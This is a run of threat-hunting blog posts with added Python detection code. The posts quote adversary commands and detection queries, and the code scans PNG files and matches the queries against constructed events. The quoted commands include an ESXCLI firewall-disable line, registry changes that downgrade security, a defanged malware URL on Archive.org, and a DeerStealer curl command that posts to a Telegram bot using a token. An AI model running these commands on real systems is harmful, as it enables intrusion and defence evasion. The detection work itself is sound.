Posts

356. Adversaries Abuse Archive.org to Store Malicious PNG Files

Hello everyone! You may be a bit tired of various legitimate web services abused by adversaries, but such services are always good targets for hunting, so let's look at another example. This time adversaries leveraged Archive[.]org to store malicious PNG files, for example:
hxxp://dn710107.ca.archive[.]org/0/items/msi-pro-with-b-64_20251208_1511/MSI_PRO_with_b64[.]png
Such files contained a steganographically embedded base64-encoded .NET assembly hidden at the end of the file. To download and execute it, the adversary used PowerShell. Knowing all of this, we can build a hunting query:
event_type: "dnsreqwin" AND dns_rname: "archive.org" AND proc_file_path: "powershell.exe"
See you tomorrow!
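As an added example (not code from this post or from the campaign it describes), here is the file-side counterpart of the telemetry query: a Python check that walks a PNG's chunk list, reports any bytes that follow the IEND chunk, and tests whether they are base64 that decodes to a PE ("MZ") header, which is what a base64-encoded .NET assembly appended to an image looks like. The sample PNG and the payload are constructed inline; the chunk walker and the tail test are the point.

```python
import base64
import binascii
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Build one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def build_minimal_png() -> bytes:
    """Constructed 1x1 grayscale PNG used as sample input (not a file from the campaign)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # width, height, depth, colour type, ...
    idat = zlib.compress(b"\x00\x00")                        # filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

def append_base64_tail(png: bytes, payload: bytes) -> bytes:
    """Constructed sample: place base64(payload) after IEND, where image decoders stop reading."""
    return png + base64.b64encode(payload)

def trailing_data_after_iend(png: bytes) -> bytes:
    """Walk the chunk list and return whatever follows IEND (b'' for a clean file)."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        pos += 12 + length                                   # length + type + data + crc
        if ctype == b"IEND":
            return png[pos:]
    raise ValueError("truncated PNG: no IEND chunk")

def looks_like_base64_pe(blob: bytes) -> bool:
    """True if the blob is strict base64 whose decoded bytes start with the 'MZ' PE header."""
    try:
        decoded = base64.b64decode(blob.strip(), validate=True)
    except (binascii.Error, ValueError):
        return False
    return decoded.startswith(b"MZ")

def scan_png(png: bytes) -> dict:
    """Summarise what sits after IEND; a .NET assembly is a PE file, so 'MZ' is the tell."""
    tail = trailing_data_after_iend(png)
    return {"trailing_bytes": len(tail), "base64_pe": looks_like_base64_pe(tail)}
```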

355. Hunting for ESXCLI Abuse

Hello everyone! If we're talking about ransomware gangs, we're always talking about Command and Scripting Interpreter: Hypervisor CLI (T1059.012). Yes, ransomware gangs love it! Let's look at RansomHouse, and focus on MrAgent. To obtain the MAC address, it runs the following command:
esxcli --formatter=csv network nic list
It runs the following command to collect information on the IP address:
esxcli --formatter=csv network nic list
It also abuses ESXCLI to disable the firewall:
esxcli network firewall set --enabled false
So, for example, we can hunt for suspicious commands related to managing host networking:
event_type: "processcreatenix" AND cmdline: ("esxcli" AND "network")
See you tomorrow!

354. Adversaries Modify Registry to Make the Console Window Appear Off-Screen

Hello everyone! We often see how adversaries hide console windows. But they can also just make them appear off-screen! Let's look at an example! This time we'll look at Cloud Atlas (or Cloud Werewolf, as we track it). The adversary modified the following registry keys to hide console windows:
"HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe"::"WindowPosition"::5122
"HKCU\UConsole\taskeng.exe"::"WindowPosition"::538126692
Quite interesting, right? And we can look for suspicious registry modification events:
event_type: "registryvaluesetwin" AND reg_key_path: "windowposition"
See you tomorrow!
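An added example, not from this post: decoding the WindowPosition values quoted above into window coordinates and flagging the ones that cannot fall inside the desktop, which is the triage step after the query fires. It assumes the console's documented packing of X in the low word and Y in the high word of the DWORD, and a hypothetical 1920x1080 desktop; the event records are constructed.

```python
from typing import NamedTuple

class WindowPos(NamedTuple):
    x: int
    y: int

def _signed16(v: int) -> int:
    """Interpret a 16-bit word as a signed coordinate (negative = left of / above the desktop)."""
    v &= 0xFFFF
    return v - 0x10000 if v & 0x8000 else v

def decode_window_position(value: int) -> WindowPos:
    """Assumption: WindowPosition packs X into the low word and Y into the high word."""
    return WindowPos(_signed16(value & 0xFFFF), _signed16(value >> 16))

def is_off_screen(pos: WindowPos, width: int = 1920, height: int = 1080) -> bool:
    """Flag an origin that lies beyond a width x height desktop on any side (hypothetical bounds)."""
    return pos.x >= width or pos.y >= height or pos.x <= -width or pos.y <= -height

# Constructed registryvaluesetwin-style records; the first two reuse the values from the post.
SAMPLE_EVENTS = [
    {"reg_key_path": r"HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe",
     "reg_value_name": "WindowPosition", "reg_value_data": 5122},
    {"reg_key_path": r"HKCU\UConsole\taskeng.exe",
     "reg_value_name": "WindowPosition", "reg_value_data": 538126692},
    {"reg_key_path": r"HKCU\Console",
     "reg_value_name": "WindowPosition", "reg_value_data": (40 << 16) | 100},   # y=40, x=100: benign
    {"reg_key_path": r"HKCU\Console",
     "reg_value_name": "WindowSize", "reg_value_data": (25 << 16) | 80},        # not a position
]

def hunt_offscreen_console(events, width: int = 1920, height: int = 1080):
    """Return (key path, decoded position) for every WindowPosition write that lands off-screen."""
    findings = []
    for ev in events:
        if str(ev.get("reg_value_name", "")).lower() != "windowposition":
            continue
        pos = decode_window_position(int(ev["reg_value_data"]))
        if is_off_screen(pos, width, height):
            findings.append((ev["reg_key_path"], pos))
    return findings
```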

353. Adversaries Abuse Fastly for C2 Infrastructure

Hello everyone! Let's look at another interesting example of how adversaries abuse legitimate infrastructure for C2. This time it's Fastly. Kaspersky revealed another ForumTroll campaign. This time the adversary leveraged Tuoni, a commercial red teaming framework. At the same time, the threat actors used the same service for C2 as in previous campaigns: Fastly. What does it mean? We can use it for our threat hunting missions!
event_type: "dnsreqwin" AND dns_rname: "fastly.net"
See you tomorrow!

352. That's How Ink Dragon Downgrades Security Controls

Hello everyone! Today we'll look at a few more examples of how adversaries intentionally weaken the Windows security posture to assist persistence and lateral movement. According to the report, Ink Dragon modified various Windows registry settings to downgrade security controls: enabled restricted admin (DisableRestrictedAdmin), disabled remote token filtering (LocalAccountTokenFilterPolicy), enabled the DSRM (Directory Services Restore Mode) Administrator account (DsrmAdminLogonBehavior), and removed Process Protection Level safeguards (RunAsPPL). These behaviors are definitely good targets for hunting, for example:
event_type: "registryvaluesetwin" AND reg_key_path: "localaccounttokenfilterpolicy" AND reg_value_data: "0x00000001"
See you tomorrow!

351. Adversaries Abuse Telegram for Payload Execution Notification

Hello everyone! Let's look at another curious case of how adversaries abuse legitimate web services to solve various tasks. This time we'll look at how they use Telegram for payload execution notification. Our example for today is DeerStealer. As you can see, the threat actors leveraged curl.exe to get a notification that the payload has been executed:
C:\WINDOWS\system32\cmd.exe /d /s /c "curl -s -X POST https://api.telegram.org/bot7972762095:AAE_DZEcCA4tkMpVK-peSGL6x4j4GMgl-3g/sendMessage -d chat_id=8093548175 -d text="undefined - executable запущен""
Similar activity may be legitimate, since administrators may use Telegram to get notifications if anything goes wrong, but it's still a good target for threat hunting:
event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: *telegram*
See you tomorrow!

350. Threat Actors Leveraged the Discord API as Their C2 Channel

Hello everyone! In some cases adversaries do not need dedicated C2 infrastructure. They can use the following technique: Web Service (T1102). UNC5174, for example, leveraged the Discord API as their C2 channel. This approach enabled the adversary to mimic legitimate traffic patterns and evade existing security policies. Unfortunately, Discord-related domains may be resolved by various legitimate software, but it's still a great target for hunting, as it's not the first time threat actors have abused it:
event_type: ("dnsreqwin" OR "dnsreqnix") AND dns_rname: ("discord.com" OR "discord.gg") AND NOT proc_file_path: *discord*
See you tomorrow!
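To show exactly what the hunting queries in posts 356, 355, 353, 352, 351 and 350 select (and what they leave out, such as a Discord lookup made by the Discord client itself), here is an added Python evaluator that is neither the product's query engine nor code from the posts: each query becomes a predicate and runs over constructed telemetry. The substring and wildcard semantics of the field filters are assumed, and the Telegram token and chat id are placeholders.

```python
import fnmatch

def match(ev: dict, field: str, pattern: str) -> bool:
    """Case-insensitive field test: '*' patterns are globs, anything else is a substring test,
    so proc_file_path: "powershell.exe" still matches a full path (assumed query semantics)."""
    value, pattern = str(ev.get(field, "")).lower(), pattern.lower()
    return fnmatch.fnmatchcase(value, pattern) if "*" in pattern else pattern in value

# One predicate per hunting query quoted in the posts above.
RULES = {
    "356 archive.org lookup by powershell": lambda e: e["event_type"] == "dnsreqwin"
        and match(e, "dns_rname", "archive.org") and match(e, "proc_file_path", "powershell.exe"),
    "355 esxcli network": lambda e: e["event_type"] == "processcreatenix"
        and match(e, "cmdline", "esxcli") and match(e, "cmdline", "network"),
    "353 fastly lookup": lambda e: e["event_type"] == "dnsreqwin" and match(e, "dns_rname", "fastly.net"),
    "352 LocalAccountTokenFilterPolicy=1": lambda e: e["event_type"] == "registryvaluesetwin"
        and match(e, "reg_key_path", "localaccounttokenfilterpolicy") and match(e, "reg_value_data", "0x00000001"),
    "351 curl to telegram": lambda e: e["event_type"] == "processcreatewin"
        and match(e, "proc_file_path", "curl.exe") and match(e, "cmdline", "*telegram*"),
    "350 discord lookup not by discord": lambda e: e["event_type"] in ("dnsreqwin", "dnsreqnix")
        and (match(e, "dns_rname", "discord.com") or match(e, "dns_rname", "discord.gg"))
        and not match(e, "proc_file_path", "*discord*"),
}

def hunt(events: list) -> dict:
    """Return {rule name: [event ids]} for every rule that fired at least once."""
    hits: dict = {}
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.setdefault(name, []).append(ev["id"])
    return hits

# Constructed telemetry (not real logs); <TOKEN> and <CHAT_ID> are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "event_type": "dnsreqwin", "dns_rname": "dn710107.ca.archive.org",
     "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 2, "event_type": "dnsreqwin", "dns_rname": "archive.org",
     "proc_file_path": r"C:\Program Files\Mozilla Firefox\firefox.exe"},             # browser: no hit
    {"id": 3, "event_type": "processcreatenix", "cmdline": "esxcli network firewall set --enabled false"},
    {"id": 4, "event_type": "processcreatewin", "proc_file_path": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -s -X POST https://api.telegram.org/bot<TOKEN>/sendMessage -d chat_id=<CHAT_ID>"},
    {"id": 5, "event_type": "dnsreqnix", "dns_rname": "gateway.discord.gg", "proc_file_path": "/usr/bin/python3"},
    {"id": 6, "event_type": "dnsreqwin", "dns_rname": "discord.com",
     "proc_file_path": r"C:\Users\u\AppData\Local\Discord\app\Discord.exe"},         # excluded by NOT
    {"id": 7, "event_type": "registryvaluesetwin", "reg_value_data": "0x00000001",
     "reg_key_path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy"},
    {"id": 8, "event_type": "dnsreqwin", "dns_rname": "global.prod.fastly.net", "proc_file_path": r"C:\Users\u\AppData\Local\Temp\update.exe"},
]
```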